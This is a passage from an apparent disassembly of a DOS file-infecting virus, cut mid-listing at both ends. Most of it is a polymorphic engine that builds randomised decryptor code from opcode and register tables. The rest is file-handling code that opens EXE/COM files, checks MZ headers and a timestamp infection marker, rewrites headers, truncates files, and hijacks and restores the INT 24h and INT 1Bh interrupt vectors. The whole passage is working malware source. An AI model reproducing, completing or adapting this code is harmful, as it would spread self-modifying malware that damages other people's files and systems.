0C01 test ah,1
0C04 jz loc_108 ; Jump if zero
0C06 mov al,data_108[bx] ; (9804:0F98=0E8h)
0C0A stosb ; Store al to es:[di]
0C0B mov ax,dx
0C0D neg ax
0C0F stosw ; Store ax to es:[di]
0C10 jmp short loc_109 ; (0C1A)
0C12 loc_108: ; xref 9804:0C04
0C12 mov al,data_109[bx] ; (9804:0F9F=0C0h)
0C16 stosb ; Store al to es:[di]
0C17 mov ax,dx
0C19 stosw ; Store ax to es:[di]
0C1A loc_109: ; xref 9804:0C10
0C1A add cl,4
0C1D pop dx
0C1E loc_ret_110: ; xref 9804:0BD8
0C1E retn
sub_28 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0A5F, 0A65, 0A6B, 0A71, 0A79, 0A90, 0A9D
; 0AA2, 0AB5, 0AC0, 0AD2
;==========================================================================
0C1F sub_29 proc near
0C1F call sub_21 ; (093A)
0C22 test al,20h ; ' '
0C24 jz loc_ret_114 ; Jump if zero
0C26 test al,8
0C28 jz loc_111 ; Jump if zero
0C2A and ah,3
0C2D add ah,1
0C30 mov al,0EBh
0C32 stosw ; Store ax to es:[di]
0C33 add cl,2
0C36 mov al,ah
0C38 jmp short loc_112 ; (0C4A)
0C3A loc_111: ; xref 9804:0C28
0C3A and ah,3
0C3D add ah,1
0C40 mov al,0E9h
0C42 stosb ; Store al to es:[di]
0C43 mov al,ah
0C45 cbw ; Convrt byte to word
0C46 stosw ; Store ax to es:[di]
0C47 add cl,3
0C4A loc_112: ; xref 9804:0C38
0C4A mov bl,al
0C4C loc_113: ; xref 9804:0C54, 0C5C, 0C65
0C4C call sub_21 ; (093A)
0C4F mov ah,al
0C51 cmp ah,2Eh ; '.'
0C54 je loc_113 ; Jump if equal
0C56 and ah,0F8h
0C59 cmp ah,0B0h
0C5C je loc_113 ; Jump if equal
0C5E stosb ; Store al to es:[di]
0C5F add cl,1
0C62 sub bl,1
0C65 jnz loc_113 ; Jump if not zero
0C67 loc_ret_114: ; xref 9804:0C24
0C67 retn
sub_29 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0AD5
;==========================================================================
0C68 sub_30 proc near
0C68 loc_115: ; xref 9804:0C7E
0C68 test data_59,10h ; (9804:018C=4)
0C6D jnz loc_117 ; Jump if not zero
0C6F call sub_21 ; (093A)
0C72 test al,4
0C74 jnz loc_116 ; Jump if not zero
0C76 movsb ; Mov [si] to es:[di]
0C77 retn
0C78 loc_116: ; xref 9804:0C74
0C78 and ah,7
0C7B cmp ah,4
0C7E je loc_115 ; Jump if equal
0C80 mov al,ah
0C82 or al,58h ; 'X'
0C84 stosb ; Store al to es:[di]
0C85 mov al,0FFh
0C87 or ah,0E0h
0C8A stosw ; Store ax to es:[di]
0C8B add cl,2
0C8E retn
0C8F loc_117: ; xref 9804:0C6D
0C8F xor data_59,10h ; (9804:018C=4)
0C94 mov al,0E9h
0C96 stosb ; Store al to es:[di]
0C97 add cl,2
0C9A mov al,cl
0C9C cbw ; Convrt byte to word
0C9D add ax,1E7Bh
0CA0 neg ax
0CA2 stosw ; Store ax to es:[di]
0CA3 retn
sub_30 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0A31
;==========================================================================
0CA4 sub_31 proc near
0CA4 push bx
0CA5 mov si,0E70h
0CA8 call sub_21 ; (093A)
0CAB jnp loc_118 ; Jump if not parity
0CAD , mov di,offset data_83 ; (9804:0E75=0BAh)
0CB0 mov ax,[di]
0CB2 push word ptr [di+2]
0CB5 push si
0CB6 movsw ; Mov [si] to es:[di]
0CB7 movsb ; Mov [si] to es:[di]
0CB8 pop si
0CB9 mov [si],ax
0CBB pop ax
0CBC mov [si+2],al
0CBF loc_118: ; xref 9804:0CAB
0CBF mov di,1E86h
0CC2 call sub_21 ; (093A)
0CC5 cmp al,55h ; 'U'
0CC7 jb loc_119 ; Jump if below
0CC9 cmp al,0AAh
0CCB jb loc_120 ; Jump if below
0CCD mov ax,[si+3]
0CD0 stosw ; Store ax to es:[di]
0CD1 movsw ; Mov [si] to es:[di]
0CD2 movsb ; Mov [si] to es:[di]
0CD3 inc si
0CD4 inc si
0CD5 movsw ; Mov [si] to es:[di]
0CD6 movsb ; Mov [si] to es:[di]
0CD7 mov byte ptr ds:[0F5Bh],3Eh ; (9804:0F5B=0) '>'
0CDC jmp short loc_121 ; (0CF7)
0CDE loc_119: ; xref 9804:0CC7
0CDE movsw ; Mov [si] to es:[di]
0CDF movsb ; Mov [si] to es:[di]
0CE0 mov ax,[si]
0CE2 inc si
0CE3 inc si
0CE4 movsw ; Mov [si] to es:[di]
0CE5 movsb ; Mov [si] to es:[di]
0CE6 stosw ; Store ax to es:[di]
0CE7 mov byte ptr ds:[0F5Bh],2Fh ; (9804:0F5B=0) '/'
0CEC jmp short loc_121 ; (0CF7)
0CEE loc_120: ; xref 9804:0CCB
0CEE movsw ; Mov [si] to es:[di]
0CEF movsw ; Mov [si] to es:[di]
0CF0 movsw ; Mov [si] to es:[di]
0CF1 movsw ; Mov [si] to es:[di]
0CF2 mov byte ptr ds:[0F5Bh],3Bh ; (9804:0F5B=0) ';'
0CF7 loc_121: ; xref 9804:0CDC, 0CEC
0CF7 mov cx,9
0CFA rep movsb ; Rep when cx >0 Mov [si] to es:[di]
0CFC pop bx
0CFD retn
sub_31 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0A51
;==========================================================================
0CFE sub_32 proc near
0CFE call sub_21 ; (093A)
0D01 cmp al,80h
0D03 jb loc_ret_125 ; Jump if below
0D05 test ah,8
0D08 jnz loc_123 ; Jump if not zero
0D0A mov al,0FAh
0D0C loc_122: ; xref 9804:0D28
0D0C stosb ; Store al to es:[di]
0D0D add cl,1
0D10 retn
0D11 loc_123: ; xref 9804:0D08
0D11 push bx
0D12 , mov bx,offset data_72 ; (9804:082F='PXS[QYRZW_V^U]')
0D15 loc_124: ; xref 9804:0D17
0D15 add al,14h
0D17 jnc loc_124 ; Jump if carry=0
0D19 cbw ; Convrt byte to word
0D1A and al,0FEh
0D1C add bx,ax
0D1E mov ah,[bx]
0D20 pop bx
0D21 mov al,9Dh
0D23 cmp data_48,1 ; (9804:0179=1)
0D28 je loc_122 ; Jump if equal
0D2A stosw ; Store ax to es:[di]
0D2B add cl,2
0D2E loc_ret_125: ; xref 9804:0D03
0D2E retn
sub_32 endp
0D2F loc_126: ; xref 9804:0D3A
0D2F xor data_59,8 ; (9804:018C=4)
0D34 retn
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0AA5
;==========================================================================
0D35 sub_33 proc near
0D35 test data_59,8 ; (9804:018C=4)
0D3A jnz loc_126 ; Jump if not zero
0D3C push bx
0D3D loc_127: ; xref 9804:0D54, 0D5B, 0D6B, 0D72
0D3D call sub_21 ; (093A)
0D40 test ah,1
0D43 jz loc_129 ; Jump if zero
0D45 and ax,7
0D48 mov bx,ax
0D4A cmp bl,4
0D4D jne loc_128 ; Jump if not equal
0D4F cmp byte ptr data_81,0B0h ; (9804:0E73=0B1h)
0D54 je loc_127 ; Jump if equal
0D56 cmp byte ptr data_96,0 ; (9804:0F5F=3)
0D5B je loc_127 ; Jump if equal
0D5D loc_128: ; xref 9804:0D4D
0D5D mov al,data_100[bx] ; (9804:0F6A=64h)
0D61 stosb ; Store al to es:[di]
0D62 inc cl
0D64 pop bx
0D65 retn
0D66 loc_129: ; xref 9804:0D43
0D66 cmp byte ptr data_96,0 ; (9804:0F5F=3)
0D6B je loc_127 ; Jump if equal
0D6D cmp byte ptr data_95,0 ; (9804:0F5E=6)
0D72 je loc_127 ; Jump if equal
0D74 loc_130: ; xref 9804:0D7C
0D74 call sub_21 ; (093A)
0D77 and ax,7
0D7A cmp al,5
0D7C ja loc_130 ; Jump if above
0D7E shl al,1 ; Shift w/zeros fill
0D80 mov bx,ax
0D82 mov ax,data_101[bx] ; (9804:0F72=0F0C0h)
0D86 stosw ; Store ax to es:[di]
0D87 cmp bl,6
0D8A ja loc_131 ; Jump if above
0D8C call sub_21 ; (093A)
0D8F and al,0Fh
0D91 stosb ; Store al to es:[di]
0D92 add cl,1
0D95 cmp bl,6
0D98 jne loc_131 ; Jump if not equal
0D9A mov al,ah
0D9C stosb ; Store al to es:[di]
0D9D add cl,1
0DA0 loc_131: ; xref 9804:0D8A, 0D98
0DA0 add cl,2
0DA3 pop bx
0DA4 retn
sub_33 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0A59
;==========================================================================
0DA5 sub_34 proc near
0DA5 call sub_21 ; (093A)
0DA8 cmp ax,5555h
0DAB jb loc_ret_134 ; Jump if below
0DAD or data_59,8 ; (9804:018C=4)
0DB2 call sub_37 ; (0E3D)
0DB5 call sub_21 ; (093A)
0DB8 xchg bx,ax
0DB9 and bx,2
0DBC mov ax,data_98[bx] ; (9804:0F61=0EC8Bh)
0DC0 stosw ; Store ax to es:[di]
0DC1 mov dx,data_78 ; (9804:0E6E=9)
0DC5 add dx,1E6Ah
0DC9 add dx,cx
0DCB add cl,2
0DCE test al,8
0DD0 jnz loc_132 ; Jump if not zero
0DD2 mov al,81h
0DD4 stosb ; Store al to es:[di]
0DD5 add cl,7
0DD8 call sub_35 ; (0DFC)
0DDB mov al,0FAh
0DDD stosb ; Store al to es:[di]
0DDE xchg dx,ax
0DDF stosw ; Store ax to es:[di]
0DE0 retn
0DE1 loc_132: ; xref 9804:0DD0
0DE1 mov al,80h
0DE3 stosb ; Store al to es:[di]
0DE4 add cl,6
0DE7 call sub_35 ; (0DFC)
0DEA cmp ah,80h
0DED ja loc_133 ; Jump if above
0DEF mov al,0FBh
0DF1 stosb ; Store al to es:[di]
0DF2 mov al,dh
0DF4 stosb ; Store al to es:[di]
0DF5 retn
0DF6 loc_133: ; xref 9804:0DED
0DF6 mov al,0FAh
0DF8 stosb ; Store al to es:[di]
0DF9 xchg dx,ax
0DFA stosb ; Store al to es:[di]
0DFB loc_ret_134: ; xref 9804:0DAB
0DFB retn
sub_34 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0DD8, 0DE7
;==========================================================================
0DFC sub_35 proc near
0DFC loc_135: ; xref 9804:0E07
0DFC call sub_21 ; (093A)
0DFF mov bl,al
0E01 and bx,7
0E04 cmp bl,4
0E07 ja loc_135 ; Jump if above
0E09 mov al,data_99[bx] ; (9804:0F65=7Eh)
0E0D stosb ; Store al to es:[di]
0E0E cmp bl,3
0E11 je loc_137 ; Jump if equal
0E13 cmp bl,4
0E16 jne loc_ret_138 ; Jump if not equal
0E18 test byte ptr [di-2],1
0E1C jnz loc_136 ; Jump if not zero
0E1E neg dh
0E20 neg dl
0E22 retn
0E23 loc_136: ; xref 9804:0E1C
0E23 neg dx
0E25 retn
0E26 loc_137: ; xref 9804:0E11
0E26 not dx
0E28 loc_ret_138: ; xref 9804:0E16
0E28 retn
sub_35 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0A5C
;==========================================================================
0E29 sub_36 proc near
0E29 test data_59,8 ; (9804:018C=4)
0E2E jz loc_ret_139 ; Jump if zero
0E30 call sub_21 ; (093A)
0E33 and ah,7Fh
0E36 add ah,0Ah
0E39 mov al,75h ; 'u'
0E3B stosw ; Store ax to es:[di]
0E3C loc_ret_139: ; xref 9804:0E2E
0E3C retn
sub_36 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0DB2
;==========================================================================
0E3D sub_37 proc near
0E3D add cl,2
0E40 mov bl,2Ah ; '*'
0E42 call sub_21 ; (093A)
0E45 loc_140: ; xref 9804:0E47
0E45 add al,bl
0E47 jnc loc_140 ; Jump if carry=0
0E49 and ax,0FEh
0E4C xchg bx,ax
0E4D mov ax,data_71[bx] ; (9804:0803=2BCDh)
0E51 stosw ; Store ax to es:[di]
0E52 retn
sub_37 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0A06
;==========================================================================
0E53 sub_38 proc near
0E53 push ax
0E54 cmp word ptr ds:[0E6Ch],0 ; (9804:0E6C=0E6Ah)
0E59 mov cx,200h
0E5C jnz loc_141 ; Jump if not zero
0E5E mov cx,dx
0E60 loc_141: ; xref 9804:0E5C
0E60 mov dx,1E86h
0E63 mov di,dx
0E65 mov ah,40h ; '@'
0E67 call sub_5 ; (02C5)
0E6A pop ax
0E6B retn
sub_38 endp
0E6C db 6Ah, 0Eh
0E6E data_78 dw 9 ; xref 9804:05B6, 062D, 0630, 09A6
; 0DC1
0E70 data_79 db 0BFh ; xref 9804:0F0F
0E71 data_80 dw 0 ; xref 9804:0F56
0E73 data_81 db 0B1h ; xref 9804:0D4F, 0ED8
0E74 data_82 db 2Dh ; xref 9804:09CE
0E75 data_83 db 0BAh ; xref 9804:0CAD, 0E89
0E76 data_84 dw 9 ; xref 9804:09A9
0E78 data_85 db 57h ; xref 9804:0E91
0E79 loc_142: ; xref 9804:0E7E
0E79 add cs:[di],cl
0E7C inc di
0E7D dec dx
0E7E jbe loc_142 ; Jump if below or =
0E80 retn
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0A2E
;==========================================================================
0E81 sub_39 proc near
0E81 push bx
0E82 call sub_19 ; (08B6)
0E85 mov ah,data_102[bx] ; (9804:0F7E=0BBh)
0E89 mov data_83,ah ; (9804:0E75=0BAh)
0E8D mov ah,data_103[bx] ; (9804:0F81=53h)
0E91 mov data_85,ah ; (9804:0E78=57h)
0E95 call sub_21 ; (093A)
0E98 mov byte ptr ds:[0F5Ch],ah ; (9804:0F5C=0FFh)
0E9C cmp ah,80h
0E9F ja loc_143 ; Jump if above
0EA1 mov ah,data_105[bx] ; (9804:0F87=4Bh)
0EA5 jmp short loc_144 ; (0EAB)
0EA7 loc_143: ; xref 9804:0E9F
0EA7 mov ah,data_104[bx] ; (9804:0F84=43h)
0EAB loc_144: ; xref 9804:0EA5
0EAB mov byte ptr ds:[0E7Ch],ah ; (9804:0E7C=47h)
0EAF mov dl,bl
0EB1 add bl,3
0EB4 cmp bl,3
0EB7 jne loc_145 ; Jump if not equal
0EB9 sub bl,2
0EBC loc_145: ; xref 9804:0EB7
0EBC mov byte ptr ds:[0F5Dh],bl ; (9804:0F5D=64h)
0EC0 loc_146: ; xref 9804:0ECF
0EC0 call sub_21 ; (093A)
0EC3 not ax
0EC5 and al,7
0EC7 mov bl,al
0EC9 shr al,1 ; Shift w/zeros fill
0ECB cmp byte ptr ds:[0F5Dh],al ; (9804:0F5D=64h)
0ECF je loc_146 ; Jump if equal
0ED1 mov data_95,al ; (9804:0F5E=6)
0ED4 mov ah,data_110[bx] ; (9804:0FA6=0B0h)
0ED8 mov data_81,ah ; (9804:0E73=0B1h)
0EDC shl dl,1 ; Shift w/zeros fill
0EDE shl dl,1 ; Shift w/zeros fill
0EE0 shl dl,1 ; Shift w/zeros fill
0EE2 add bl,dl
0EE4 mov ah,data_111[bx] ; (9804:0FAE=7)
0EE8 mov byte ptr ds:[0E7Bh],ah ; (9804:0E7B=0Dh)
0EEC loc_147: ; xref 9804:0EF9, 0EFF, 0F05
0EEC call sub_21 ; (093A)
0EEF not ax
0EF1 mov bl,al
0EF3 and bl,7
0EF6 cmp bl,6
0EF9 ja loc_147 ; Jump if above
0EFB cmp byte ptr ds:[0F5Dh],bl ; (9804:0F5D=64h)
0EFF je loc_147 ; Jump if equal
0F01 cmp data_95,bl ; (9804:0F5E=6)
0F05 je loc_147 ; Jump if equal
0F07 mov data_96,bl ; (9804:0F5F=3)
0F0B mov ah,data_106[bx] ; (9804:0F8A=0B8h)
0F0F mov data_79,ah ; (9804:0E70=0BFh)
0F13 mov ah,data_107[bx] ; (9804:0F91=48h)
0F17 mov byte ptr ds:[0E7Dh],ah ; (9804:0E7D=4Ah)
0F1B call sub_21 ; (093A)
0F1E and al,7
0F20 cbw ; Convrt byte to word
0F21 mov bx,ax
0F23 mov ah,data_112[bx] ; (9804:0FC6=75h)
0F27 mov byte ptr ds:[0E7Eh],ah ; (9804:0E7E=76h)
0F2B mov data_97,bl ; (9804:0F60=7)
0F2F call sub_21 ; (093A)
0F32 not ax
0F34 xor bx,bx ; Zero register
0F36 mov bl,al
0F38 and bl,3
0F3B mov al,data_48 ; (9804:0179=1)
0F3E or al,al ; Zero ?
0F40 jz loc_148 ; Jump if zero
0F42 mov bl,al
0F44 loc_148: ; xref 9804:0F40
0F44 mov ah,data_113[bx] ; (9804:0FCE=3Eh)
0F48 mov byte ptr ds:[0E79h],ah ; (9804:0E79=2Eh)
0F4C mov al,byte ptr ds:[0F5Ch] ; (9804:0F5C=0FFh)
0F4F and al,7
0F51 cbw ; Convrt byte to word
0F52 inc ax
0F53 add ax,1E6Ah
0F56 mov data_80,ax ; (9804:0E71=0)
0F59 pop bx
0F5A retn
sub_39 endp
0F5B add bh,bh
0F5D db 64h
0F5E data_95 db 6 ; xref 9804:0D6D, 0ED1, 0F01, 149F
; 161C
0F5F data_96 db 3 ; xref 9804:0B2C, 0D56, 0D66, 0F07
0F60 data_97 db 7 ; xref 9804:0B1F, 0B32, 0B39, 0BE7
; 0F2B
0F61 data_98 dw 0EC8Bh ; Data table (indexed access)
; xref 9804:0DBC
0F63 db 54h, 5Dh
0F65 data_99 db 7Eh ; Data table (indexed access)
; xref 9804:0E09
0F66 db 76h, 6Eh, 66h, 46h
0F6A data_100 db 64h ; Data table (indexed access)
; xref 9804:0D5D
0F6B db 65h, 67h, 9Bh,0D6h, 9Bh, 64h
0F71 db 65h
0F72 data_101 dw 0F0C0h ; Data table (indexed access)
; xref 9804:0D82
0F74 db 0C1h,0F0h,0F6h,0C8h,0F7h,0C8h
0F7A db 0D0h,0F0h,0D1h,0F0h
0F7E data_102 db 0BBh ; Data table (indexed access)
; xref 9804:0E85, 146D
0F7F db 0BFh,0BEh
0F81 data_103 db 53h ; Data table (indexed access)
; xref 9804:0E8D
0F82 db 57h, 56h
0F84 data_104 db 43h ; Data table (indexed access)
; xref 9804:0EA7, 1475
0F85 db 47h, 46h
0F87 data_105 db 4Bh ; Data table (indexed access)
; xref 9804:0EA1
0F88 db 4Fh, 4Eh
0F8A data_106 db 0B8h ; Data table (indexed access)
; xref 9804:0F0B
0F8B db 0BBh,0B9h,0BAh,0BFh,0BEh,0BDh
0F91 data_107 db 48h ; Data table (indexed access)
; xref 9804:0F13
0F92 db 4Bh, 49h, 4Ah, 4Fh, 4Eh, 4Dh
0F98 data_108 db 0E8h ; Data table (indexed access)
; xref 9804:0B46, 0B91, 0BAD, 0C06
0F99 db 0EBh,0E9h,0EAh,0EFh,0EEh,0EDh
0F9F data_109 db 0C0h ; Data table (indexed access)
; xref 9804:0B4E, 0B99, 0BA5, 0C12
0FA0 db 0C3h,0C1h,0C2h,0C7h,0C6h,0C5h
0FA6 data_110 db 0B0h ; Data table (indexed access)
; xref 9804:0ED4, 1113, 14A3
0FA7 db 0B4h,0B3h,0B7h,0B1h,0B5h,0B2h
0FAD db 0B6h
0FAE data_111 db 7 ; Data table (indexed access)
; xref 9804:0EE4, 10FC, 14BB
0FAF db 27h, 00h, 00h, 0Fh, 2Fh, 17h
0FB5 db 37h, 05h, 25h, 1Dh, 3Dh, 0Dh
0FBB db 2Dh, 15h, 35h, 04h, 24h, 1Ch
0FC1 db 3Ch, 0Ch, 2Ch, 14h
0FC5 db 34h
0FC6 data_112 db 75h ; Data table (indexed access)
; xref 9804:0F23
0FC7 db 79h, 7Fh, 7Dh, 77h, 73h, 72h
0FCD db 76h
0FCE data_113 db 3Eh ; Data table (indexed access)
; xref 9804:0F44, 15C5
0FCF db 2Eh, 26h, 36h
0FD2 data_114 db 30h ; Data table (indexed access)
; xref 9804:09AF, 09BE, 10E3, 14D6
; 14E2
0FD3 db 00h, 28h, 30h
0FD6 data_115 db 0C0h ; Data table (indexed access)
; xref 9804:14AB, 1626
0FD7 db 0C4h,0C3h,0C7h,0C1h,0C5h,0C2h
0FDD db 0C6h
0FDE data_116 db 0E8h ; Data table (indexed access)
; xref 9804:1631
0FDF db 0ECh,0EBh,0EFh,0E9h,0EDh,0EAh
0FE5 db 0EEh
0FE6 data_117 db 75h ; Data table (indexed access)
; xref 9804:14CB
0FE7 db 78h, 7Ch, 7Eh
0FEA data_118 dw 1F16h ; Data table (indexed access)
; xref 9804:15E8
0FEC db 50h, 1Fh, 8Eh,0D8h, 16h, 07h
0FF2 db 50h, 07h, 8Eh,0C0h
0FF6 data_119 db 0C0h ; Data table (indexed access)
; xref 9804:151E
0FF7 db 0C9h,0D2h,0DBh
0FFA data_120 dw 178h ; xref 9804:11D3, 1213
0FFC data_121 dw 0A17h ; xref 9804:11DB
0FFE data_122 dw 604h ; xref 9804:11E3
1000 data_123 dw 315h ; xref 9804:11EB
1002 db 0B0h, 03h,0CFh
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:03C6
;==========================================================================
1005 sub_40 proc near
1005 push ax
1006 push bx
1007 push cx
1008 push dx
1009 push es
100A push ds
100B push di
100C push si
100D call sub_42 ; (11CA)
1010 call sub_12 ; (068B)
1013 mov ax,3D02h
1016 call sub_5 ; (02C5)
1019 jc loc_153 ; Jump if carry Set
101B push ax
101C call sub_15 ; (06FE)
101F add bx,4
1022 mov cx,bx
1024 pop bx
1025 cmp cx,0Eh
1028 je loc_152 ; Jump if equal
102A push cs
102B pop ds
102C cld ; Clear direction
102D , mov di,offset 73Bh ; (9804:073B='LP.EXE9E.EXE')
1030 , mov si,offset data_67 ; (9804:0748='LP.EXED.COME')
1033 repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
1035 jcxz loc_149 ; Jump if cx=0
1037 jmp short loc_152 ; (1067)
1039 loc_149: ; xref 9804:1035
1039 mov cx,1Ch
103C mov dx,1E6Ah
103F mov ah,3Fh ; '?'
1041 call sub_5 ; (02C5)
1044 jc loc_152 ; Jump if carry Set
1046 call sub_10 ; (0669)
1049 mov ax,data_51 ; (9804:017E=61F7h)
104C and al,1Fh
104E cmp al,11h
1050 jne loc_151 ; Jump if not equal
1052 mov ax,data_157 ; (9804:1E6A=0BC98h)
1055 cmp ax,5A4Dh
1058 je loc_150 ; Jump if equal
105A cmp ax,4D5Ah
105D jne loc_151 ; Jump if not equal
105F loc_150: ; xref 9804:1058
105F call sub_41 ; (107B)
1062 jc loc_152 ; Jump if carry Set
1064 loc_151: ; xref 9804:1050, 105D
1064 call sub_11 ; (067A)
1067 loc_152: ; xref 9804:1028, 1037, 1044, 1062
1067 mov ah,3Eh ; '>'
1069 call sub_5 ; (02C5)
106C loc_153: ; xref 9804:1019
106C call sub_13 ; (069F)
106F call sub_43 ; (1209)
1072 pop si
1073 pop di
1074 pop ds
1075 pop es
1076 pop dx
1077 pop cx
1078 pop bx
1079 pop ax
107A retn
sub_40 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0494, 105F
;==========================================================================
107B sub_41 proc near
107B mov ax,ds:data_168e ; (9804:1E80=0)
107E mov dx,10h
1081 mul dx ; dx:ax = reg * ax
1083 add ax,ds:data_166e ; (9804:1E7E=0)
1087 adc dx,0
108A mov cx,data_162 ; (9804:1E72=0EB2Dh)
108E shl cx,1 ; Shift w/zeros fill
1090 shl cx,1 ; Shift w/zeros fill
1092 shl cx,1 ; Shift w/zeros fill
1094 shl cx,1 ; Shift w/zeros fill
1096 add ax,cx
1098 adc dx,0
109B mov cx,dx
109D mov dx,ax
109F mov ax,4200h
10A2 call sub_5 ; (02C5)
10A5 jnc loc_154 ; Jump if carry=0
10A7 retn
10A8 loc_154: ; xref 9804:10A5
10A8 sub ax,1E6Ah
10AB sbb dx,0
10AE push ax
10AF push dx
10B0 mov ah,3Fh ; '?'
10B2 mov cx,80h
10B5 mov dx,1E88h
10B8 call sub_5 ; (02C5)
10BB jnc loc_155 ; Jump if carry=0
10BD cmp ax,24h
10C0 ja loc_155 ; Jump if above
10C2 add sp,4
10C5 stc ; Set carry flag
10C6 retn
10C7 loc_155: ; xref 9804:10BB, 10C0
10C7 push bx
10C8 mov di,ax
10CA add di,dx
10CC mov cx,32h
10CF std ; Set direction flag
10D0 mov al,2Eh ; '.'
10D2 repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
10D4 or cx,cx ; Zero ?
10D6 jnz loc_156 ; Jump if not zero
10D8 pop bx
10D9 add sp,4
10DC stc ; Set carry flag
10DD retn
10DE loc_156: ; xref 9804:10D6
10DE mov ah,[di+2]
10E1 xor bx,bx ; Zero register
10E3 loc_157: ; xref 9804:10EF
10E3 , cmp data_114[bx],ah ; (9804:0FD2=30h)
10E7 je loc_159 ; Jump if equal
10E9 inc bx
10EA cmp bx,4
10ED ja loc_158 ; Jump if above
10EF jmp short loc_157 ; (10E3)
10F1 loc_158: ; xref 9804:10ED
10F1 pop bx
10F2 add sp,4
10F5 stc ; Set carry flag
10F6 retn
10F7 loc_159: ; xref 9804:10E7
10F7 mov al,[di+3]
10FA xor bx,bx ; Zero register
10FC loc_160: ; xref 9804:1108
10FC , cmp al,data_111[bx] ; (9804:0FAE=7)
1100 je loc_162 ; Jump if equal
1102 inc bx
1103 cmp bx,19h
1106 ja loc_161 ; Jump if above
1108 jmp short loc_160 ; (10FC)
110A loc_161: ; xref 9804:1106
110A pop bx
110B add sp,4
110E stc ; Set carry flag
110F retn
1110 loc_162: ; xref 9804:1100
1110 and bl,7
1113 mov al,data_110[bx] ; (9804:0FA6=0B0h)
1117 mov cx,32h
111A repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
111C or cx,cx ; Zero ?
111E jnz loc_163 ; Jump if not zero
1120 pop bx
1121 add sp,4
1124 stc ; Set carry flag
1125 retn
1126 loc_163: ; xref 9804:111E
1126 mov al,[di+2]
1129 cld ; Clear direction
112A pop bx
112B pop cx
112C pop dx
112D push dx
112E push cx
112F push ax
1130 mov ax,4200h
1133 add dx,16Bh
1137 adc cx,0
113A call sub_5 ; (02C5)
113D mov cx,0Fh
1140 mov dx,1E88h
1143 mov ah,3Fh ; '?'
1145 call sub_5 ; (02C5)
1148 pop ax
1149 mov byte ptr ds:[1154h],ah ; (9804:1154=0)
114D jmp short $+2 ; delay for I/O
114F mov di,dx
1151 mov cx,0Fh
1154 locloop_164: ; xref 9804:1159
1154 add [di],al
1156 not byte ptr [di]
1158 inc di
1159 loop locloop_164 ; Loop if cx > 0
115B mov di,dx
115D mov ax,[di]
115F mov ds:data_166e,ax ; (9804:1E7E=0)
1162 mov ax,[di+2]
1165 mov ds:data_168e,ax ; (9804:1E80=0)
1168 mov ax,[di+4]
116B mov ds:data_165e,ax ; (9804:1E7A=0)
116E mov ax,[di+6]
1171 mov ds:data_164e,ax ; (9804:1E78=0)
1174 mov ax,[di+8]
1177 mov data_159,ax ; (9804:1E6C=4E2Dh)
117A mov ax,[di+0Ah]
117D mov data_161,ax ; (9804:1E6E=2417h)
1180 mov ax,[di+0Ch]
1183 mov data_51,ax ; (9804:017E=61F7h)
1186 mov al,[di+0Eh]
1189 cmp al,1
118B je loc_165 ; Jump if equal
118D add sp,4
1190 stc ; Set carry flag
1191 retn
1192 loc_165: ; xref 9804:118B
1192 pop cx
1193 pop dx
1194 push dx
1195 push cx
1196 and dx,1FFh
119A cmp data_159,dx ; (9804:1E6C=4E2Dh)
119E je loc_166 ; Jump if equal
11A0 add sp,4
11A3 stc ; Set carry flag
11A4 retn
11A5 loc_166: ; xref 9804:119E
11A5 xor cx,cx ; Zero register
11A7 mov dx,cx
11A9 mov ax,4200h
11AC call sub_5 ; (02C5)
11AF mov dx,1E6Ah
11B2 mov cx,1Ch
11B5 mov ah,40h ; '@'
11B7 call sub_5 ; (02C5)
11BA pop cx
11BB pop dx
11BC mov ax,4200h
11BF call sub_5 ; (02C5)
11C2 mov ah,40h ; '@'
11C4 xor cx,cx ; Zero register
11C6 call sub_5 ; (02C5)
11C9 retn
sub_41 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0431, 100D, 124B
;==========================================================================
11CA sub_42 proc near
11CA push es
11CB xor ax,ax ; Zero register
11CD mov es,ax
11CF mov ax,es:data_12e ; (0000:0090=155h)
11D3 mov cs:data_120,ax ; (9804:0FFA=178h)
11D7 mov ax,es:data_13e ; (0000:0092=1336h)
11DB mov cs:data_121,ax ; (9804:0FFC=0A17h)
11DF mov ax,es:data_4e ; (0000:006C=6EEh)
11E3 mov cs:data_122,ax ; (9804:0FFE=604h)
11E7 mov ax,es:data_5e ; (0000:006E=70h)
11EB mov cs:data_123,ax ; (9804:1000=315h)
11EF mov es:data_13e,cs ; (0000:0092=1336h)
11F4 mov word ptr es:data_12e,1002h ; (0000:0090=155h)
11FB mov es:data_5e,cs ; (0000:006E=70h)
1200 mov word ptr es:data_4e,1004h ; (0000:006C=6EEh)
1207 pop es
1208 retn
sub_42 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:04BA, 106F, 12B9
;==========================================================================
1209 sub_43 proc near
1209 push ds
120A push es
120B push si
120C xor ax,ax ; Zero register
120E cld ; Clear direction
120F push cs
1210 pop ds
1211 mov es,ax
1213 , mov si,offset data_120 ; (9804:0FFA=78h)
1216 , mov di,data_12e ; (0000:0090=55h)
1219 movsw ; Mov [si] to es:[di]
121A movsw ; Mov [si] to es:[di]
121B , mov di,data_4e ; (0000:006C=0EEh)
121E movsw ; Mov [si] to es:[di]
121F movsw ; Mov [si] to es:[di]
1220 pop si
1221 pop es
1222 pop ds
1223 retn
sub_43 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:05E2
;==========================================================================
1224 sub_44 proc near
1224 loc_167: ; xref 9804:122A
1224 call sub_21 ; (093A)
1227 and ax,3
122A jz loc_167 ; Jump if zero
122C add ax,ds:data_168e ; (9804:1E80=0)
1230 mov ds:data_164e,ax ; (9804:1E78=0)
1233 call sub_21 ; (093A)
1236 and ax,7
1239 add ax,1F7Ah
123C and al,0FEh
